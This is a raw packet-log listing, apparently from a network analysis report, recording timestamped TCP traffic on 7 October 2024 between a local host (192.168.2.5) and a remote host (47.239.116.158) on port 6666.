                                                                                                            Oct 7, 2024 06:39:14.999252081 CEST66664970947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:14.999305964 CEST66664970947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:14.999320030 CEST497096666192.168.2.547.239.116.158
                                                                                                            Oct 7, 2024 06:39:14.999337912 CEST66664970947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:14.999509096 CEST497096666192.168.2.547.239.116.158
                                                                                                            Oct 7, 2024 06:39:15.214073896 CEST66664970947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:15.214092970 CEST66664970947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:15.214107990 CEST66664970947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:15.214123011 CEST66664970947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:15.214139938 CEST66664970947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:15.214150906 CEST497096666192.168.2.547.239.116.158
                                                                                                            Oct 7, 2024 06:39:15.214154959 CEST66664970947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:15.214170933 CEST66664970947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:15.214186907 CEST497096666192.168.2.547.239.116.158
                                                                                                            Oct 7, 2024 06:39:15.214215994 CEST497096666192.168.2.547.239.116.158
                                                                                                            Oct 7, 2024 06:39:15.214402914 CEST66664970947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:15.214416981 CEST66664970947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:15.214426994 CEST66664970947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:15.214432955 CEST66664970947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:15.214479923 CEST497096666192.168.2.547.239.116.158
                                                                                                            Oct 7, 2024 06:39:15.214956045 CEST66664970947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:15.214987040 CEST66664970947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:15.215010881 CEST497096666192.168.2.547.239.116.158
                                                                                                            Oct 7, 2024 06:39:15.215020895 CEST66664970947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:15.215053082 CEST66664970947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:15.215086937 CEST66664970947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:15.215097904 CEST497096666192.168.2.547.239.116.158
                                                                                                            Oct 7, 2024 06:39:15.215120077 CEST66664970947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:15.215153933 CEST66664970947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:15.215164900 CEST497096666192.168.2.547.239.116.158
                                                                                                            Oct 7, 2024 06:39:15.215197086 CEST497096666192.168.2.547.239.116.158
                                                                                                            Oct 7, 2024 06:39:15.215981960 CEST66664970947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:15.216023922 CEST66664970947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:15.216041088 CEST66664970947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:15.216059923 CEST66664970947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:15.216080904 CEST497096666192.168.2.547.239.116.158
                                                                                                            Oct 7, 2024 06:39:15.216114998 CEST497096666192.168.2.547.239.116.158
                                                                                                            Oct 7, 2024 06:39:15.216202974 CEST66664970947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:15.216219902 CEST66664970947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:15.216237068 CEST66664970947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:15.216270924 CEST497096666192.168.2.547.239.116.158
                                                                                                            Oct 7, 2024 06:39:15.217057943 CEST66664970947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:15.217072964 CEST66664970947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:15.217088938 CEST66664970947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:15.217104912 CEST66664970947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:15.217120886 CEST66664970947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:15.217122078 CEST497096666192.168.2.547.239.116.158
                                                                                                            Oct 7, 2024 06:39:15.217135906 CEST66664970947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:15.217144966 CEST497096666192.168.2.547.239.116.158
                                                                                                            Oct 7, 2024 06:39:15.217160940 CEST497096666192.168.2.547.239.116.158
                                                                                                            Oct 7, 2024 06:39:15.217200994 CEST66664970947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:15.217233896 CEST497096666192.168.2.547.239.116.158
                                                                                                            Oct 7, 2024 06:39:15.217884064 CEST66664970947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:15.217899084 CEST66664970947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:15.217958927 CEST497096666192.168.2.547.239.116.158
                                                                                                            Oct 7, 2024 06:39:15.218045950 CEST66664970947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:15.218072891 CEST66664970947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:15.218116999 CEST497096666192.168.2.547.239.116.158
                                                                                                            Oct 7, 2024 06:39:15.432524920 CEST66664970947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:15.432681084 CEST66664970947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:15.432738066 CEST66664970947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:15.432744980 CEST497096666192.168.2.547.239.116.158
                                                                                                            Oct 7, 2024 06:39:15.432771921 CEST66664970947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:15.432818890 CEST497096666192.168.2.547.239.116.158
                                                                                                            Oct 7, 2024 06:39:15.432822943 CEST66664970947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:15.432858944 CEST66664970947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:15.432892084 CEST66664970947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:15.432925940 CEST66664970947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:15.432939053 CEST497096666192.168.2.547.239.116.158
                                                                                                            Oct 7, 2024 06:39:15.432959080 CEST66664970947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:15.432960987 CEST497096666192.168.2.547.239.116.158
                                                                                                            Oct 7, 2024 06:39:15.433008909 CEST66664970947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:15.433041096 CEST66664970947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:15.433052063 CEST497096666192.168.2.547.239.116.158
                                                                                                            Oct 7, 2024 06:39:15.433074951 CEST66664970947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:15.433105946 CEST66664970947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:15.433157921 CEST66664970947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:15.433159113 CEST497096666192.168.2.547.239.116.158
                                                                                                            Oct 7, 2024 06:39:15.433190107 CEST66664970947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:15.433223009 CEST66664970947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:15.433233023 CEST497096666192.168.2.547.239.116.158
                                                                                                            Oct 7, 2024 06:39:15.433257103 CEST66664970947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:15.433265924 CEST497096666192.168.2.547.239.116.158
                                                                                                            Oct 7, 2024 06:39:15.433512926 CEST66664970947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:15.433545113 CEST66664970947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:15.433593988 CEST497096666192.168.2.547.239.116.158
                                                                                                            Oct 7, 2024 06:39:15.433595896 CEST66664970947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:15.433629036 CEST66664970947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:15.433675051 CEST497096666192.168.2.547.239.116.158
                                                                                                            Oct 7, 2024 06:39:15.433679104 CEST66664970947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:15.433712006 CEST66664970947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:15.433722973 CEST497096666192.168.2.547.239.116.158
                                                                                                            Oct 7, 2024 06:39:15.433744907 CEST66664970947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:15.433775902 CEST66664970947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:15.433810949 CEST66664970947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:15.433821917 CEST497096666192.168.2.547.239.116.158
                                                                                                            Oct 7, 2024 06:39:15.433845043 CEST66664970947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:15.433893919 CEST497096666192.168.2.547.239.116.158
                                                                                                            Oct 7, 2024 06:39:15.434423923 CEST66664970947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:15.434475899 CEST66664970947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:15.434526920 CEST497096666192.168.2.547.239.116.158
                                                                                                            Oct 7, 2024 06:39:15.434526920 CEST66664970947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:15.434560061 CEST66664970947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:15.434575081 CEST497096666192.168.2.547.239.116.158
                                                                                                            Oct 7, 2024 06:39:15.434593916 CEST66664970947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:15.434624910 CEST66664970947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:15.434659004 CEST66664970947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:15.434672117 CEST497096666192.168.2.547.239.116.158
                                                                                                            Oct 7, 2024 06:39:15.434691906 CEST66664970947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:15.434700012 CEST497096666192.168.2.547.239.116.158
                                                                                                            Oct 7, 2024 06:39:15.434726954 CEST66664970947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:15.434775114 CEST497096666192.168.2.547.239.116.158
                                                                                                            Oct 7, 2024 06:39:15.435230970 CEST66664970947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:15.435283899 CEST66664970947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:15.435317993 CEST66664970947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:15.435334921 CEST497096666192.168.2.547.239.116.158
                                                                                                            Oct 7, 2024 06:39:15.435373068 CEST66664970947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:15.435420990 CEST66664970947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:15.435451984 CEST66664970947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:15.435470104 CEST497096666192.168.2.547.239.116.158
                                                                                                            Oct 7, 2024 06:39:15.435487032 CEST66664970947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:15.435497046 CEST497096666192.168.2.547.239.116.158
                                                                                                            Oct 7, 2024 06:39:15.435518980 CEST66664970947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:15.435551882 CEST66664970947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:15.435565948 CEST497096666192.168.2.547.239.116.158
                                                                                                            Oct 7, 2024 06:39:15.435585022 CEST66664970947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:15.435745001 CEST497096666192.168.2.547.239.116.158
                                                                                                            Oct 7, 2024 06:39:15.436100006 CEST66664970947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:15.436151028 CEST66664970947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:15.436203003 CEST497096666192.168.2.547.239.116.158
                                                                                                            Oct 7, 2024 06:39:15.436204910 CEST66664970947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:15.436237097 CEST66664970947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:15.436270952 CEST66664970947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:15.436283112 CEST497096666192.168.2.547.239.116.158
                                                                                                            Oct 7, 2024 06:39:15.436302900 CEST66664970947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:15.436338902 CEST66664970947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:15.436350107 CEST497096666192.168.2.547.239.116.158
                                                                                                            Oct 7, 2024 06:39:15.436373949 CEST66664970947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:15.436418056 CEST497096666192.168.2.547.239.116.158
                                                                                                            Oct 7, 2024 06:39:15.651256084 CEST66664970947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:15.651324034 CEST66664970947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:15.651357889 CEST66664970947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:15.651375055 CEST497096666192.168.2.547.239.116.158
                                                                                                            Oct 7, 2024 06:39:15.651415110 CEST66664970947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:15.651446104 CEST66664970947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:15.651458979 CEST497096666192.168.2.547.239.116.158
                                                                                                            Oct 7, 2024 06:39:15.651480913 CEST66664970947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:15.651523113 CEST497096666192.168.2.547.239.116.158
                                                                                                            Oct 7, 2024 06:39:15.651530981 CEST66664970947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:15.651562929 CEST66664970947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:15.651611090 CEST497096666192.168.2.547.239.116.158
                                                                                                            Oct 7, 2024 06:39:15.651612997 CEST66664970947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:15.651644945 CEST66664970947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:15.651675940 CEST66664970947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:15.651685953 CEST497096666192.168.2.547.239.116.158
                                                                                                            Oct 7, 2024 06:39:15.651710033 CEST66664970947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:15.651741028 CEST66664970947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:15.651751041 CEST497096666192.168.2.547.239.116.158
                                                                                                            Oct 7, 2024 06:39:15.651777029 CEST66664970947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:15.651818037 CEST497096666192.168.2.547.239.116.158
                                                                                                            Oct 7, 2024 06:39:15.652164936 CEST66664970947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:15.652215004 CEST66664970947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:15.652256966 CEST497096666192.168.2.547.239.116.158
                                                                                                            Oct 7, 2024 06:39:15.652265072 CEST66664970947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:15.652297974 CEST66664970947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:15.652331114 CEST66664970947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:15.652339935 CEST497096666192.168.2.547.239.116.158
                                                                                                            Oct 7, 2024 06:39:15.652383089 CEST66664970947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:15.652415037 CEST66664970947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:15.652422905 CEST497096666192.168.2.547.239.116.158
                                                                                                            Oct 7, 2024 06:39:15.652447939 CEST66664970947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:15.652481079 CEST66664970947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:15.652488947 CEST497096666192.168.2.547.239.116.158
                                                                                                            Oct 7, 2024 06:39:15.652513981 CEST66664970947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:15.652545929 CEST66664970947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:15.652553082 CEST497096666192.168.2.547.239.116.158
                                                                                                            Oct 7, 2024 06:39:15.652578115 CEST66664970947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:15.652611017 CEST66664970947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:15.652628899 CEST497096666192.168.2.547.239.116.158
                                                                                                            Oct 7, 2024 06:39:15.652641058 CEST66664970947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:15.652673960 CEST66664970947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:15.652683973 CEST497096666192.168.2.547.239.116.158
                                                                                                            Oct 7, 2024 06:39:15.652709007 CEST66664970947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:15.652741909 CEST66664970947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:15.652750015 CEST497096666192.168.2.547.239.116.158
                                                                                                            Oct 7, 2024 06:39:15.652775049 CEST66664970947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:15.652815104 CEST497096666192.168.2.547.239.116.158
                                                                                                            Oct 7, 2024 06:39:15.652827024 CEST66664970947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:15.652861118 CEST66664970947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:15.652894974 CEST66664970947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:15.652905941 CEST497096666192.168.2.547.239.116.158
                                                                                                            Oct 7, 2024 06:39:15.652924061 CEST66664970947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:15.652962923 CEST497096666192.168.2.547.239.116.158
                                                                                                            Oct 7, 2024 06:39:15.652971983 CEST66664970947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:15.653022051 CEST66664970947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:15.653053045 CEST66664970947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:15.653064013 CEST497096666192.168.2.547.239.116.158
                                                                                                            Oct 7, 2024 06:39:15.653085947 CEST66664970947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:15.653116941 CEST66664970947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:15.653122902 CEST497096666192.168.2.547.239.116.158
                                                                                                            Oct 7, 2024 06:39:15.653151989 CEST66664970947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:15.653183937 CEST66664970947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:15.653202057 CEST497096666192.168.2.547.239.116.158
                                                                                                            Oct 7, 2024 06:39:15.653234005 CEST66664970947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:15.653265953 CEST66664970947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:15.653280973 CEST497096666192.168.2.547.239.116.158
                                                                                                            Oct 7, 2024 06:39:15.653296947 CEST66664970947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:15.653332949 CEST66664970947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:15.653338909 CEST497096666192.168.2.547.239.116.158
                                                                                                            Oct 7, 2024 06:39:15.815026045 CEST497096666192.168.2.547.239.116.158
                                                                                                            Oct 7, 2024 06:39:16.816505909 CEST497286666192.168.2.547.239.116.158
                                                                                                            Oct 7, 2024 06:39:16.821400881 CEST66664972847.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:16.821469069 CEST497286666192.168.2.547.239.116.158
                                                                                                            Oct 7, 2024 06:39:17.974459887 CEST497396666192.168.2.547.239.116.158
                                                                                                            Oct 7, 2024 06:39:17.979527950 CEST66664973947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:17.979661942 CEST497396666192.168.2.547.239.116.158
                                                                                                            Oct 7, 2024 06:39:17.979811907 CEST497396666192.168.2.547.239.116.158
                                                                                                            Oct 7, 2024 06:39:17.984661102 CEST66664973947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:18.675513983 CEST497096666192.168.2.547.239.116.158
                                                                                                            Oct 7, 2024 06:39:18.858648062 CEST66664973947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:18.858680964 CEST66664973947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:18.858695984 CEST66664973947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:18.858738899 CEST66664973947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:18.858747005 CEST497396666192.168.2.547.239.116.158
                                                                                                            Oct 7, 2024 06:39:18.858753920 CEST66664973947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:18.858772039 CEST66664973947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:18.858788967 CEST66664973947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:18.858798981 CEST497396666192.168.2.547.239.116.158
                                                                                                            Oct 7, 2024 06:39:18.858813047 CEST497396666192.168.2.547.239.116.158
                                                                                                            Oct 7, 2024 06:39:18.858838081 CEST66664973947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:18.858853102 CEST66664973947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:18.858870983 CEST66664973947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:18.858891010 CEST497396666192.168.2.547.239.116.158
                                                                                                            Oct 7, 2024 06:39:18.858908892 CEST497396666192.168.2.547.239.116.158
                                                                                                            Oct 7, 2024 06:39:18.863779068 CEST66664973947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:18.863794088 CEST66664973947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:18.863810062 CEST66664973947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:18.863832951 CEST497396666192.168.2.547.239.116.158
                                                                                                            Oct 7, 2024 06:39:18.908802032 CEST497396666192.168.2.547.239.116.158
                                                                                                            Oct 7, 2024 06:39:19.076678038 CEST66664973947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:19.076716900 CEST66664973947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:19.076751947 CEST66664973947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:19.076777935 CEST497396666192.168.2.547.239.116.158
                                                                                                            Oct 7, 2024 06:39:19.076786995 CEST66664973947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:19.076845884 CEST66664973947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:19.076881886 CEST66664973947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:19.076889992 CEST497396666192.168.2.547.239.116.158
                                                                                                            Oct 7, 2024 06:39:19.076915026 CEST66664973947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:19.076948881 CEST66664973947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:19.076957941 CEST497396666192.168.2.547.239.116.158
                                                                                                            Oct 7, 2024 06:39:19.076987028 CEST497396666192.168.2.547.239.116.158
                                                                                                            Oct 7, 2024 06:39:19.077784061 CEST66664973947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:19.077836990 CEST66664973947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:19.077878952 CEST497396666192.168.2.547.239.116.158
                                                                                                            Oct 7, 2024 06:39:19.077888012 CEST66664973947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:19.077920914 CEST66664973947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:19.077953100 CEST66664973947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:19.077958107 CEST497396666192.168.2.547.239.116.158
                                                                                                            Oct 7, 2024 06:39:19.078654051 CEST66664973947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:19.078704119 CEST66664973947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:19.078737974 CEST66664973947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:19.078753948 CEST497396666192.168.2.547.239.116.158
                                                                                                            Oct 7, 2024 06:39:19.078772068 CEST66664973947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:19.078805923 CEST66664973947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:19.078814983 CEST497396666192.168.2.547.239.116.158
                                                                                                            Oct 7, 2024 06:39:19.078854084 CEST497396666192.168.2.547.239.116.158
                                                                                                            Oct 7, 2024 06:39:19.079585075 CEST66664973947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:19.079617977 CEST66664973947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:19.079651117 CEST66664973947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:19.079663038 CEST497396666192.168.2.547.239.116.158
                                                                                                            Oct 7, 2024 06:39:19.079684019 CEST66664973947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:19.079725981 CEST497396666192.168.2.547.239.116.158
                                                                                                            Oct 7, 2024 06:39:19.294641018 CEST66664973947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:19.294696093 CEST66664973947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:19.294747114 CEST66664973947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:19.294783115 CEST66664973947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:19.294780970 CEST497396666192.168.2.547.239.116.158
                                                                                                            Oct 7, 2024 06:39:19.294816971 CEST66664973947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:19.294848919 CEST66664973947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:19.294861078 CEST497396666192.168.2.547.239.116.158
                                                                                                            Oct 7, 2024 06:39:19.294886112 CEST66664973947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:19.294929981 CEST497396666192.168.2.547.239.116.158
                                                                                                            Oct 7, 2024 06:39:19.294953108 CEST66664973947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:19.295000076 CEST497396666192.168.2.547.239.116.158
                                                                                                            Oct 7, 2024 06:39:19.295231104 CEST66664973947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:19.295283079 CEST66664973947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:19.295315981 CEST66664973947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:19.295345068 CEST497396666192.168.2.547.239.116.158
                                                                                                            Oct 7, 2024 06:39:19.295366049 CEST66664973947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:19.295414925 CEST66664973947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:19.295449972 CEST66664973947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:19.295460939 CEST497396666192.168.2.547.239.116.158
                                                                                                            Oct 7, 2024 06:39:19.295483112 CEST66664973947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:19.295486927 CEST497396666192.168.2.547.239.116.158
                                                                                                            Oct 7, 2024 06:39:19.295517921 CEST66664973947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:19.295561075 CEST497396666192.168.2.547.239.116.158
                                                                                                            Oct 7, 2024 06:39:19.296192884 CEST66664973947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:19.296257019 CEST66664973947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:19.296288967 CEST66664973947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:19.296302080 CEST497396666192.168.2.547.239.116.158
                                                                                                            Oct 7, 2024 06:39:19.296320915 CEST66664973947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:19.296355963 CEST66664973947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:19.296387911 CEST66664973947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:19.296411037 CEST497396666192.168.2.547.239.116.158
                                                                                                            Oct 7, 2024 06:39:19.296423912 CEST66664973947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:19.296432972 CEST497396666192.168.2.547.239.116.158
                                                                                                            Oct 7, 2024 06:39:19.297041893 CEST66664973947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:19.297075033 CEST66664973947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:19.297101021 CEST497396666192.168.2.547.239.116.158
                                                                                                            Oct 7, 2024 06:39:19.297125101 CEST66664973947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:19.297158003 CEST66664973947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:19.297167063 CEST497396666192.168.2.547.239.116.158
                                                                                                            Oct 7, 2024 06:39:19.297190905 CEST66664973947.239.116.158192.168.2.5
                                                                                                            Oct 7, 2024 06:39:19.297224045 CEST66664973947.239.116.158192.168.2.5
